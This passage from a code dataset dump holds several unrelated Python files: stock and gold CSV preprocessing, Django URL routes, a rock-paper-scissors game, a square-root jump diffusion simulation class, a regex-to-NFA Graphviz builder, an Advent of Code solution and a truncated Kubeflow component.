pd.DataFrame(samsung).sort_values(\"일자\",ascending=[\"True\"])\r\nsamsung_y_row = samsung_sort2.loc[\"2018/05/15\":\"2020/11/19\"]\r\nsamsung_y_c = samsung_y_row[\"시가\"]\r\n\r\n\r\nfor i in range(len(samsung_y_c.index)):\r\n samsung_y_c.iloc[i] = int(samsung_y_c.iloc[i].replace(\",\",\"\"))\r\n\r\nsamsung_y_set = []\r\nfor j in range(len(samsung_y_c.index)):\r\n samsung_y_set.append(samsung_y_c.iloc[j])\r\n\r\n\r\n\r\nsamsung_y = np.array(samsung_y_set)\r\n\r\n\r\nnp.save(\"./data/samsung_x.npy\", arr=samsung_x)\r\nnp.save(\"./data/samsung_y.npy\", arr=samsung_y)\r\nprint(samsung_x.shape) # (624, 2)\r\nprint(samsung_y.shape) # (620,)\r\n\r\n'''\r\nprint(\"삼성끝\")\r\n\r\n# ==================== bit computer ====================\r\n'''\r\nbit = pd.read_csv(\"./data/csv/비트컴퓨터 1120.csv\",header=0,index_col=0,sep=\",\",encoding='CP949') \r\n\r\nbit_sort = pd.DataFrame(bit).sort_values(\"일자\",ascending=[\"True\"])\r\nbit_x_row = bit_sort.loc[\"2018/05/04\":\"2020/11/17\"] \r\nbit_x_tv = bit_x_row[\"거래량\"] \r\nbit_x_ta = bit_x_row[\"금액(백만)\"] \r\nbit_x_o = bit_x_row[\"시가\"] \r\nbit_x_h = bit_x_row[\"고가\"]\r\nbit_x_c = bit_x_row[\"종가\"]\r\n\r\nfor i in range(len(bit_x_tv.index)):\r\n bit_x_tv.iloc[i] = int(bit_x_tv.iloc[i].replace(\",\",\"\"))\r\n bit_x_ta.iloc[i] = int(bit_x_ta.iloc[i].replace(\",\",\"\"))\r\n bit_x_o.iloc[i] = int(bit_x_o.iloc[i].replace(\",\",\"\"))\r\n bit_x_h.iloc[i] = int(bit_x_h.iloc[i].replace(\",\",\"\"))\r\n bit_x_c.iloc[i] = int(bit_x_c.iloc[i].replace(\",\",\"\"))\r\n\r\nbit_x_set = []\r\nfor j in range(len(bit_x_tv.index)):\r\n bit_x_set.append([int(bit_x_ta.iloc[j]*1000000/bit_x_tv.iloc[j]),\r\n bit_x_o.iloc[j],\r\n bit_x_h.iloc[j],\r\n bit_x_c.iloc[j]]) \r\n\r\nbit_x = np.array(bit_x_set)\r\nnp.save(\"./data/bit_x.npy\", arr=bit_x)\r\n\r\nprint(\"비트끝\")\r\n# ==================== gold ====================\r\n\r\ngold = pd.read_csv(\"./data/csv/금현물.csv\",header=0,index_col=0,sep=\",\",encoding='CP949') \r\n\r\ngold_sort = pd.DataFrame(gold).sort_values(\"일자\",ascending=[\"True\"])\r\ngold_x_row = 
gold_sort.loc[\"2018/05/04\":\"2020/11/17\"] \r\ngold_x_tv = gold_x_row[\"거래량\"] \r\ngold_x_ta = gold_x_row[\"거래대금(백만)\"] \r\ngold_x_o = gold_x_row[\"시가\"] \r\ngold_x_h = gold_x_row[\"고가\"] \r\ngold_x_l = gold_x_row[\"저가\"] \r\ngold_x_c = gold_x_row[\"종가\"]\r\n\r\nfor i in range(len(gold_x_tv.index)):\r\n gold_x_tv.iloc[i] = int(gold_x_tv.iloc[i].replace(\",\",\"\"))\r\n gold_x_ta.iloc[i] = int(gold_x_ta.iloc[i].replace(\",\",\"\"))\r\n gold_x_o.iloc[i] = int(gold_x_o.iloc[i].replace(\",\",\"\"))\r\n gold_x_h.iloc[i] = int(gold_x_h.iloc[i].replace(\",\",\"\"))\r\n gold_x_l.iloc[i] = int(gold_x_l.iloc[i].replace(\",\",\"\"))\r\n gold_x_c.iloc[i] = int(gold_x_c.iloc[i].replace(\",\",\"\"))\r\n\r\ngold_x_set = []\r\n\r\nfor j in range(len(gold_x_tv.index)):\r\n gold_x_set.append([int(gold_x_ta.iloc[j]*1000000/gold_x_tv.iloc[j]),\r\n gold_x_o.iloc[j],\r\n gold_x_h.iloc[j],\r\n gold_x_l.iloc[j],\r\n gold_x_c.iloc[j]]) \r\n\r\ngold_x = np.array(gold_x_set)\r\nnp.save(\"./data/gold_x.npy\", arr=gold_x)\r\n\r\nprint(\"gold끝\")\r\n\r\n# ==================== kosdaq ====================\r\n\r\nkosdaq = pd.read_csv(\"./data/csv/코스닥.csv\",header=0,index_col=0,sep=\",\",encoding='CP949') \r\n\r\nkosdaq_sort = pd.DataFrame(kosdaq).sort_values(\"일자\",ascending=[\"True\"])\r\nkosdaq_x_row = kosdaq_sort.loc[\"2018/05/04\":\"2020/11/17\"] \r\nkosdaq_x_tv = kosdaq_x_row[\"거래량\"] \r\nkosdaq_x_ta = kosdaq_x_row[\"거래대금\"] \r\nkosdaq_x_o = kosdaq_x_row[\"시가\"] \r\nkosdaq_x_h = kosdaq_x_row[\"고가\"] \r\nkosdaq_x_l = kosdaq_x_row[\"저가\"] \r\nkosdaq_x_c = kosdaq_x_row[\"현재가\"]\r\nkosdaq_x_u = kosdaq_x_row[\"상승\"]\r\n\r\nfor i in range(len(kosdaq_x_tv.index)):\r\n kosdaq_x_tv.iloc[i] = int(kosdaq_x_tv.iloc[i].replace(\",\",\"\"))\r\n kosdaq_x_ta.iloc[i] = int(kosdaq_x_ta.iloc[i].replace(\",\",\"\"))\r\n kosdaq_x_o.iloc[i] = int(kosdaq_x_o.iloc[i])\r\n kosdaq_x_h.iloc[i] = int(kosdaq_x_h.iloc[i])\r\n kosdaq_x_l.iloc[i] = int(kosdaq_x_l.iloc[i])\r\n kosdaq_x_c.iloc[i] = int(kosdaq_x_c.iloc[i])\r\n kosdaq_x_u.iloc[i] = int(kosdaq_x_u.iloc[i].replace(\",\",\"\"))\r\n\r\nkosdaq_x_set = []\r\n\r\nfor j in range(len(kosdaq_x_tv.index)):\r\n kosdaq_x_set.append([int(kosdaq_x_tv.iloc[j]*1000000/kosdaq_x_tv.iloc[j]*1000),\r\n kosdaq_x_o.iloc[j],\r\n kosdaq_x_h.iloc[j],\r\n kosdaq_x_l.iloc[j],\r\n kosdaq_x_u.iloc[j],\r\n kosdaq_x_c.iloc[j]]) \r\n\r\nkosdaq_x = np.array(kosdaq_x_set)\r\nnp.save(\"./data/kosdaq_x.npy\", arr=kosdaq_x)\r\n\r\nprint(\"kosdaq끝\")\r\n","repo_name":"GODKIMCHI142/bit_seoul","sub_path":"Study/keras/stcok_data_parsing.py","file_name":"stcok_data_parsing.py","file_ext":"py","file_size_in_byte":5997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71153900912","text":"\"\"\"\nFichero para separar routing por aplicacionesun proyecto.\n\nDe modo que definimos para esta app las rutas que son exclusivamente suyas y luego las importamos en el router\nprincipal del proyecto.\n\"\"\"\n\nfrom django.urls import path\nfrom traperos import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('respuesta/', views.respuesta_simple, name='respuesta'),\n path('traperos/', views.traperos_lista, name='traperos'),\n path('traperos/', views.traperos_id, name='trapero_id'),\n path('discos/', views.DiscoListView.as_view(), name='discos'),\n path('discos/', views.DiscoDetailView.as_view(), name='disco_id'),\n path('tiraeras/', views.tiraeras_lista, name='tiraeras'),\n path('tiraeras/', views.tiraeras_id, name='tiraera_id'),\n path('tiraeras_trapero/', 
views.tiraeras_trapero, name='tiraeras_trapero'),\n    path('alertas/', views.AlertaCreate.as_view(), name='alertas'),\n    path('alertas/gracias/', views.AlertaGraciasView.as_view(), name='alertas'),\n    path('fin/', views.FinView.as_view(), name='fin'),\n    path('prueba/', views.TextView.as_view(), name='a')\n]\n","repo_name":"albeerto26/DjangoServerHeroku","sub_path":"traperos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"28583696038","text":"import random\r\n\r\nmy_choice = input('Rock, Paper, or Scissors? ')\r\nwhile my_choice != \"\":\r\n    random_choice = random.randint(0,2)\r\n\r\n    if random_choice == 0:\r\n        computer_choice = 'rock'\r\n    elif random_choice == 1:\r\n        computer_choice = 'paper'\r\n    else:\r\n        computer_choice = 'scissors'\r\n\r\n    if my_choice == 'rock':\r\n        if computer_choice == 'scissors':\r\n            print('You chose rock and computer chose scissors...You won')\r\n        elif computer_choice == 'rock':\r\n            print('You chose rock and computer chose rock...You are both tied')\r\n        else:\r\n            print('You chose rock and computer chose paper...You lose')\r\n    elif my_choice == 'paper':\r\n        if computer_choice == 'scissors':\r\n            print('You chose paper and computer chose scissors...You lose')\r\n        elif computer_choice == 'rock':\r\n            print('You chose paper and computer chose rock...You won')\r\n        else:\r\n            print('You chose paper and computer chose paper...You are both tied')\r\n    else:\r\n        if computer_choice == 'scissors':\r\n            print('You chose scissors and computer chose scissors...You are both tied')\r\n        elif computer_choice == 'rock':\r\n            print('You chose scissors and computer chose rock...You lose')\r\n        else:\r\n            print('You chose scissors and computer chose paper...You won')\r\n\r\n    print('Computer has picked', computer_choice)\r\n    my_choice = input('Rock, Paper, or Scissors? ')\r\n","repo_name":"itsmealex56/myPyVenture","sub_path":"Chapter 3/jackenpoy.py","file_name":"jackenpoy.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"844225110","text":"#\n# DX Analytics\n# Base Classes and Model Classes for Simulation\n# square_root_jump_diffusion.py\n#\n# DX Analytics is a financial analytics library, mainly for\n# derivatives modeling and pricing by Monte Carlo simulation\n#\n# (c) Dr. Yves J. Hilpisch\n# The Python Quants GmbH\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. 
If not, see http://www.gnu.org/licenses/.\n#\nfrom ..frame import *\nfrom .simulation_class import simulation_class\nfrom .square_root_diffusion import *\n\n\nclass square_root_jump_diffusion(simulation_class):\n ''' Class to generate simulated paths based on\n the square-root jump diffusion model.\n\n Attributes\n ==========\n name : string\n name of the object\n mar_env : instance of market_environment\n market environment data for simulation\n corr : boolean\n True if correlated with other model object\n\n Methods\n =======\n update :\n updates parameters\n generate_paths :\n returns Monte Carlo paths for the market environment\n '''\n\n def __init__(self, name, mar_env, corr=False):\n super(square_root_jump_diffusion, self).__init__(name, mar_env, corr)\n try:\n self.kappa = mar_env.get_constant('kappa')\n self.theta = mar_env.get_constant('theta')\n self.lamb = mar_env.get_constant('lambda')\n self.mu = mar_env.get_constant('mu')\n self.delt = mar_env.get_constant('delta')\n except:\n print('Error parsing market environment.')\n\n def update(self, pricing_date=None, initial_value=None, volatility=None,\n kappa=None, theta=None, lamb=None, mu=None, delt=None,\n final_date=None):\n if pricing_date is not None:\n self.pricing_date = pricing_date\n self.time_grid = None\n self.generate_time_grid()\n if initial_value is not None:\n self.initial_value = initial_value\n if volatility is not None:\n self.volatility = volatility\n if kappa is not None:\n self.kappa = kappa\n if theta is not None:\n self.theta = theta\n if lamb is not None:\n self.lamb = lamb\n if mu is not None:\n self.mu = mu\n if delt is not None:\n self.delt = delt\n if final_date is not None:\n self.final_date = final_date\n self.instrument_values = None\n self.time_grid = None\n\n def generate_paths(self, fixed_seed=True, day_count=365.):\n if self.time_grid is None:\n self.generate_time_grid()\n M = len(self.time_grid)\n I = self.paths\n paths = np.zeros((M, I))\n paths_ = np.zeros_like(paths)\n paths[0] = self.initial_value\n paths_[0] = self.initial_value\n if self.correlated is False:\n rand = sn_random_numbers((1, M, I),\n fixed_seed=fixed_seed)\n else:\n rand = self.random_numbers\n snr = sn_random_numbers((1, M, I),\n fixed_seed=fixed_seed)\n rj = self.lamb * (np.exp(self.mu + 0.5 * self.delt ** 2) - 1)\n\n for t in range(1, len(self.time_grid)):\n dt = (self.time_grid[t] - self.time_grid[t - 1]).days / day_count\n if self.correlated is False:\n ran = rand[t]\n else:\n ran = np.dot(self.cholesky_matrix, rand[:, t, :])\n ran = ran[self.rn_set]\n poi = np.random.poisson(self.lamb * dt, I)\n # full truncation Euler discretization\n paths_[t, :] = (paths_[t - 1, :] + self.kappa *\n (self.theta - np.maximum(0, paths_[t - 1, :])) * dt +\n np.sqrt(np.maximum(0, paths_[t - 1, :])) *\n self.volatility * np.sqrt(dt) * ran +\n ((np.exp(self.mu + self.delt * snr[t]) - 1) * poi) *\n np.maximum(0, paths_[t - 1, :]) - rj * dt)\n paths[t, :] = np.maximum(0, paths_[t, :])\n self.instrument_values = paths\n\n\nclass square_root_jump_diffusion_plus(square_root_jump_diffusion):\n ''' Class to generate simulated paths based on\n the square-root jump diffusion model with term structure.\n\n Attributes\n ==========\n name : string\n name of the object\n mar_env : instance of market_environment\n market environment data for simulation\n corr : boolean\n True if correlated with other model object\n\n Methods\n =======\n srd_forward_error :\n error function for forward rate/vols calibration\n generate_shift_base :\n generates a shift base 
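For reference while reading generate_paths above: the full-truncation Euler step it implements corresponds, as read off the code (not quoted from the library's documentation), to

\tilde{x}_t = \tilde{x}_{t-1} + \kappa\,(\theta - \tilde{x}_{t-1}^{+})\,\Delta t + \sigma\,\sqrt{\tilde{x}_{t-1}^{+}}\,\sqrt{\Delta t}\,z_t + \big(e^{\mu + \delta u_t} - 1\big)\,n_t\,\tilde{x}_{t-1}^{+} - \lambda\,\big(e^{\mu + \delta^{2}/2} - 1\big)\,\Delta t, \qquad x_t = \max(\tilde{x}_t, 0),

where x^{+} = \max(x, 0), z_t and u_t are the standard normals drawn as rand and snr, n_t \sim \mathrm{Poisson}(\lambda\,\Delta t) is poi, and the last term is the compensator rj \cdot dt that keeps the jump component centered.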
to take term structure into account\n update :\n updates parameters\n update_shift_values :\n updates shift values for term structure\n generate_paths :\n returns Monte Carlo paths for the market environment\n update_forward_rates :\n updates forward rates (vol, int. rates) for given time grid\n '''\n\n def __init__(self, name, mar_env, corr=False):\n super(square_root_jump_diffusion_plus,\n self).__init__(name, mar_env, corr)\n try:\n self.term_structure = mar_env.get_curve('term_structure')\n except:\n self.term_structure = None\n print('Missing Term Structure.')\n\n self.forward_rates = []\n self.shift_base = None\n self.shift_values = []\n\n def srd_forward_error(self, p0):\n if p0[0] < 0 or p0[1] < 0 or p0[2] < 0:\n return 100\n f_model = srd_forwards(self.initial_value, p0,\n self.term_structure[:, 0])\n\n MSE = np.sum((self.term_structure[:, 1] -\n f_model) ** 2) / len(f_model)\n return MSE\n\n def generate_shift_base(self, p0):\n # calibration\n opt = sco.fmin(self.srd_forward_error, p0)\n # shift_calculation\n f_model = srd_forwards(self.initial_value, opt,\n self.term_structure[:, 0])\n shifts = self.term_structure[:, 1] - f_model\n self.shift_base = np.array((self.term_structure[:, 0], shifts)).T\n\n def update_shift_values(self, k=1):\n if self.shift_base is not None:\n t = get_year_deltas(self.shift_base[:, 0])\n tck = sci.splrep(t, self.shift_base[:, 1], k=k)\n self.generate_time_grid()\n st = get_year_deltas(self.time_grid)\n self.shift_values = np.array(list(zip(self.time_grid,\n sci.splev(st, tck, der=0))))\n else:\n self.shift_values = np.array(list(zip(self.time_grid,\n np.zeros(len(self.time_grid)))))\n\n def generate_paths(self, fixed_seed=True, day_count=365.):\n if self.time_grid is None:\n self.generate_time_grid()\n self.update_shift_values()\n M = len(self.time_grid)\n I = self.paths\n paths = np.zeros((M, I))\n paths_ = np.zeros_like(paths)\n paths[0] = self.initial_value\n paths_[0] = self.initial_value\n if self.correlated is False:\n rand = sn_random_numbers((1, M, I),\n fixed_seed=fixed_seed)\n else:\n rand = self.random_numbers\n snr = sn_random_numbers((1, M, I),\n fixed_seed=fixed_seed)\n # forward_rates = self.discount_curve.get_forward_rates(\n # self.time_grid, dtobjects=True)\n rj = self.lamb * (np.exp(self.mu + 0.5 * self.delt ** 2) - 1)\n for t in range(1, len(self.time_grid)):\n dt = (self.time_grid[t] - self.time_grid[t - 1]).days / day_count\n if self.correlated is False:\n ran = rand[t]\n else:\n ran = np.dot(self.cholesky_matrix, rand[:, t, :])\n ran = ran[self.rn_set]\n poi = np.random.poisson(self.lamb * dt, I)\n # full truncation Euler discretization\n paths_[t] = (paths_[t - 1] + self.kappa *\n (self.theta - np.maximum(0, paths_[t - 1])) * dt +\n np.sqrt(np.maximum(0, paths_[t - 1])) *\n self.volatility * np.sqrt(dt) * ran +\n ((np.exp(self.mu + self.delt * snr[t]) - 1) * poi) *\n np.maximum(0, paths_[t - 1]) - rj * dt)\n paths[t] = np.maximum(0, paths_[t]) + self.shift_values[t, 1]\n self.instrument_values = paths\n\n def update_forward_rates(self, time_grid=None):\n if time_grid is None:\n self.generate_time_grid()\n time_grid = self.time_grid\n t = get_year_deltas(time_grid)\n g = np.sqrt(self.kappa ** 2 + 2 * self.volatility ** 2)\n sum1 = ((self.kappa * self.theta * (np.exp(g * t) - 1)) /\n (2 * g + (self.kappa + g) * (np.exp(g * t) - 1)))\n sum2 = self.initial_value * ((4 * g ** 2 * np.exp(g * t)) /\n (2 * g + (self.kappa + g) *\n (np.exp(g * t) - 1)) ** 2)\n self.forward_rates = np.array(list(zip(time_grid, sum1 + 
sum2)))\n","repo_name":"yhilpisch/dx","sub_path":"dx/models/square_root_jump_diffusion.py","file_name":"square_root_jump_diffusion.py","file_ext":"py","file_size_in_byte":9717,"program_lang":"python","lang":"en","doc_type":"code","stars":666,"dataset":"github-code","pt":"38"} +{"seq_id":"19537089003","text":"import subprocess\nfrom Pila import Pila\nimport constantes\nimport os\n\nsimbolos = constantes.CONSTANT_S\nflecha = constantes.CONSTANT_F\noperadoresunarios = constantes.CONSTANT_U\n\ndef obtenerExpresionPostFija(expresionInfija):\n miComando = 'java App \"'+expresionInfija+'\"'\n tempStr = subprocess.check_output(miComando, shell=True)\n return list(tempStr.decode(\"utf-8\").strip())\n\ndef evaluarExpresion(expresionPostFijaList):\n\n pila = Pila()\n \n listaFinal = []\n\n i = 0\n\n contador = 1\n\n for j in expresionPostFijaList:\n\n caracter = j\n\n if caracter in simbolos:\n\n listaDeOperandos = []\n \n operandosNecesarios = 1 if caracter in operadoresunarios else 2\n\n elemento = ()\n\n for i in range(operandosNecesarios):\n\n elemento = pila.extraer()\n\n listaDeOperandos.append(elemento)\n \n print(listaDeOperandos)\n if operandosNecesarios == 1:\n listaDeIniciales = []\n listaDeFinales = []\n\n for i in listaDeOperandos:\n inicial,final = obtenerEstadoInicialYFinal(i,caracter)\n listaDeIniciales.append(inicial)\n listaDeFinales.append(final)\n\n listaDeTuplas = obtenerInstruccionesDeOperadoresUnitarios(caracter,contador,listaDeIniciales,listaDeFinales)\n listaTemporal = unirListas(listaDeOperandos,listaDeTuplas)\n pila.incluir(listaTemporal)\n\n else:\n\n listaDeIniciales = []\n listaDeFinales = []\n \n \n for i in listaDeOperandos:\n inicial, final = obtenerEstadoInicialYFinal(i,caracter)\n listaDeIniciales.append(inicial)\n listaDeFinales.append(final)\n\n listaDeIniciales.sort() \n listaDeFinales.sort()\n\n\n if caracter == \"|\":\n \n listaDeTuplas = obtenerInstruccionesDeOperadoresNoUnitarios(caracter,contador,listaDeIniciales,listaDeFinales,listaDeOperandos)\n \n contador+=2\n \n else:\n\n listaDeTuplas, nodoAEliminar = obtenerInstruccionesDeOperadoresNoUnitarios(caracter,contador,listaDeIniciales,listaDeFinales,listaDeOperandos)\n \n for operando in listaDeOperandos:\n for tupla in operando:\n if nodoAEliminar in tupla:\n operando.remove(tupla)\n \n for operando in listaDeOperandos:\n if len(operando) ==0:\n listaDeOperandos.remove(operando)\n \n listaTemporal =list(set(unirListas(listaDeOperandos,listaDeTuplas)))\n pila.incluir(listaTemporal)\n\n else:\n \n tuplaTemporal = [(str(contador), str(contador+1), caracter)]\n contador+=2\n \n pila.incluir(tuplaTemporal)\n\n\n for i in range(pila.tamano()):\n elemento = pila.extraer()\n for tupla in elemento:\n a,b = tupla[0], tupla[1]\n\n if int(a) != int(b):\n listaFinal.append(tupla)\n\n listaFinal.reverse()\n listaFinal = [listaFinal]\n\n return listaFinal\n\ndef unirListas(llistaUno, listaDos):\n listaF = []\n\n for i in llistaUno:\n for elemento in i:\n listaF.append(elemento)\n for i in listaDos:\n listaF.append(i)\n return listaF\n\ndef obtenerEstadoInicialYFinal(lista, caracter):\n inicial = 0\n final = 0\n\n listaAuxiliar = []\n\n for tupla in lista:\n\n for j in range(2):\n listaAuxiliar.append(int(tupla[j]))\n\n listaAuxiliar = sorted(set(listaAuxiliar))\n\n final = max(listaAuxiliar)\n\n listaAuxiliar.pop()\n\n if caracter == \"*\" or caracter == \"+\":\n inicial = max(listaAuxiliar)\n elif caracter == \"|\" or caracter == \".\":\n inicial = min(listaAuxiliar)\n\n\n \n\n return inicial, final\n\ndef 
obtenerInstruccionesDeOperadoresNoUnitarios(operador, contador, listaDeIniciales, listaDeFinales,listaDeOperandos):\n\n listaDeTuplas = []\n\n inicial = contador\n final = contador+1\n\n if operador == \".\":\n listaDeOperandos.reverse()\n operandoA, operandoB = listaDeOperandos[0], listaDeOperandos[1]\n\n inicialA, finalA = obtenerEstadoInicialYFinal(operandoA,\".\")\n inicialB, finalB = obtenerEstadoInicialYFinal(operandoB,\".\")\n nuevoNodo = min(finalA,inicialB)\n nodoAEliminar = max(finalA, inicialB)\n\n for operando in listaDeOperandos:\n for tupla in operando:\n\n a,b,c = tupla[0], tupla[1],tupla[2]\n\n if str(nodoAEliminar) in tupla:\n\n for i in range(len(tupla)-1):\n\n a = nuevoNodo if a == str(nodoAEliminar) else a\n b = nuevoNodo if b == str(nodoAEliminar) else b\n\n listaDeTuplas.append((a,b,c))\n return listaDeTuplas, str(nodoAEliminar)\n\n if operador == \"|\":\n\n for i in range(2):\n \n listaDeTuplas.append((str(inicial),str(listaDeIniciales[i]),\"ε\"))\n \n listaDeTuplas.append((str(listaDeFinales[i]),str(final),\"ε\"))\n\n return listaDeTuplas\n\ndef obtenerInstruccionesDeOperadoresUnitarios(operador, contador,listaDeIniciales,listaDeFinales):\n listaDeTuplas = []\n\n inicial = contador - 2\n final = contador - 1\n\n\n if operador == \"+\":\n\n listaDeTuplas.append((str(listaDeFinales[0]) , str(listaDeIniciales[0]) , \"ε\"))\n listaDeTuplas.append((str(contador) , str(listaDeIniciales[0]) , \"ε\"))\n listaDeTuplas.append((str(final) , str(contador+1), \"ε\")) \n \n elif operador == \"*\":\n\n listaDeTuplas.append((str(listaDeFinales[0]) , str(listaDeIniciales[0]) , \"ε\"))\n listaDeTuplas.append((str(contador) , str(listaDeIniciales[0]) , \"ε\"))\n listaDeTuplas.append((str(final) , str(contador+1), \"ε\")) \n\n listaDeTuplas.append((str(contador) , str(contador+1), \"ε\")) \n \n return listaDeTuplas\n\ndef obtenerEstadoInicialFinal(listaDeTuplas):\n listaTemporal = []\n for i in range(len(listaDeTuplas)):\n iTupla = listaDeTuplas[i]\n for j in range(len(iTupla)-1):\n listaTemporal.append(listaDeTuplas[i][j])\n\n listaTemporal = list(set(listaTemporal))\n\n final = max(listaTemporal)\n\n posicion = 0\n \n while posicion < len(listaTemporal):\n if listaTemporal[posicion] == final:\n listaTemporal.pop(posicion)\n\n posicion+=1\n\n inicial = max(listaTemporal)\n\n return inicial,final\n\ndef probarApp():\n expresionInfija = input(\":\")\n expresionPostFijaList = obtenerExpresionPostFija(expresionInfija)\n listaDeTuplas = evaluarExpresion(expresionPostFijaList)\n obtenerArchivo(listaDeTuplas)\n\ndef obtenerArchivo(listaDeTuplas):\n str1 = \"digraph AFN{\"+\"\\n\"\n str2 = \"rankdir = LR;\"+\"\\n\"\n str3 = 'node[shape=circle, style=\"filled\", fixedsize=true,width=0.2, color=\"#FFF7A8\", fontsize=8]'+\"\\n\"\n str4 = \"edge [ fontname=Arial, fontcolor=blue, fontsize=8 ];\"\n str5 = 'node [name = \"1\"];'+\"\\n\"\n str6 = \"}\"\n\n lista = [str1,str2,str3,str4,str5]\n\n f = open(\"input.dot\", \"w\")\n \n for m in lista:\n f.write(str(m))\n\n for elemento in listaDeTuplas:\n for tupla in elemento:\n a,b,c = str(tupla[0]),str(tupla[1]), str(tupla[2])\n nuevaStr = ''+a+' -> '+''+b+' [label = \"'+c+'\", color=\"red\"]'+\"\\n\"\n f.write(nuevaStr)\n f.write(str6)\n f.close()\n subprocess.call(\"dot -Tpng input.dot > output.png\", 
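The record above shells out to a Java helper (the java App call in obtenerExpresionPostFija) just to turn the infix regular expression into postfix. The same step can be done in-process with a shunting-yard pass; a sketch only, assuming the operator set behind simbolos is '|' (union), '.' (explicit concatenation) and the postfix unary '*' and '+' — the function name here is illustrative, not from the original.

# Hypothetical in-process replacement for the `java App` postfix step.
PRECEDENCE = {'|': 1, '.': 2, '*': 3, '+': 3}  # assumed operator set

def obtener_postfija(expresion: str) -> list:
    salida, pila = [], []
    for ch in expresion:
        if ch == '(':
            pila.append(ch)
        elif ch == ')':
            while pila and pila[-1] != '(':
                salida.append(pila.pop())
            pila.pop()  # discard the '('
        elif ch in PRECEDENCE:
            while pila and pila[-1] != '(' and PRECEDENCE[pila[-1]] >= PRECEDENCE[ch]:
                salida.append(pila.pop())
            pila.append(ch)
        else:  # operand symbol
            salida.append(ch)
    salida.extend(reversed(pila))
    return salida

# e.g. obtener_postfija('(a|b).c*') -> ['a', 'b', '|', 'c', '*', '.']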
shell=True)\n\nprobarApp()","repo_name":"ExogearXxx/Compiladores_ESCOM","sub_path":"Copia/App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":7967,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"37792798057","text":"from __future__ import print_function\nimport numpy as np\n\nstart_file = open('./aoc_day_8_input.txt')\ninstructions = start_file.read().strip().splitlines()\n\n#screen = [[0]*50 for _ in range(6)]\nscreen = np.zeros((6,50))\n\ndef get_screen_string():\n    return '\\n'.join([''.join(['#' if screen[r,c] == 1 else ' ' for c in range(50)]) for r in range(6)])\n\n\nfor line in instructions:\n    info = line.split()\n    if len(info) == 2:\n        cols, rows = [int(v) for v in info[1].split('x')]\n        for r in range(rows):\n            for c in range(cols):\n                screen[r, c] = 1\n    else:\n        distance = int(info[4])\n        if info[1] == 'row':\n            row = int(info[2].split('=')[1])\n            screen[row] = np.roll(screen[row], distance)\n\n        else:\n            col = int(info[2].split('=')[1])\n            screen.T[col] = np.roll(screen.T[col], distance)\n\n\nprint(np.sum(screen))\nprint(get_screen_string())\n\n\n\n\n\n\n","repo_name":"jtsimmons108/AdventOfCode2016","sub_path":"Day8/aoc_day_8.py","file_name":"aoc_day_8.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"73081093869","text":"#!/usr/bin/env python3\n\"\"\"\nYAML-file-based implementation of pipeline components\n\"\"\"\n\nimport argparse\nimport json\n\nfrom kfp.v2.dsl import Dataset, Model, Metrics, Artifact\nfrom google.cloud import storage\n\n\ndef obtain_args():\n    \"\"\"\n    Get the args\n    \"\"\"\n\n    parser = argparse.ArgumentParser(description=\"\")\n\n    parser.add_argument(\"--in-artifact-path\", type=Artifact, help=\"\") #name, uri, metadata\n    parser.add_argument(\"--in-dataset-path\", type=Dataset, help=\"\") #name, uri, metadata\n    parser.add_argument(\"--in-metrics-path\", type=Metrics, help=\"\") #name, uri, metadata\n    parser.add_argument(\"--in-model-path\", type=Model, help=\"\") #name, uri, metadata\n    # parser.add_argument(\"--out-metrics\", type=str, help=\"\")\n    # parser.add_argument(\"--out-artifact\", type=str, help=\"\")\n    # \n    parser.add_argument(\"--output-metadata\", type=str, help=\"\") #name, uri, metadata\n    parser.add_argument(\"--output-model\", type=Model, help=\"\") #name, uri, metadata\n    # \n    args = parser.parse_args()\n    return args\n\n\n# Obtain args\nargs = obtain_args()\n\n# \nprint(\"args.in_artifact_path.name\", args.in_artifact_path.name)\nprint(\"args.in_dataset_path.name\", args.in_dataset_path.name)\nprint(\"args.in_metrics_path.name\", args.in_metrics_path.name)\nprint(\"args.in_model_path.name\", args.in_model_path.name)\n# \n# print(\"args.out_artifact.name\", args.out_artifact.name)\n# print(\"args.out_artifact.path\", args.out_artifact.path)\n# print(\"args.out_artifact.uri\", args.out_artifact.uri)\n# \nprint(\"args.output_metadata\", args.output_metadata)\n\nprint(\"args.output_model.name\", args.output_model.name)\nprint(\"args.output_model.path\", args.output_model.path)\nprint(\"args.output_model.uri\", args.output_model.uri)\n\n\"\"\"\n# ===============================\n# Collect data from storage\n# ===============================\n# Instantiates a client\nstorage_client = storage.Client()\nbucket = storage_client.bucket(args.original_bucket_id)\n\n# Download csv file from GCS\nblob = bucket.blob(args.target_filename) # train.csv or test.csv\ndata = 
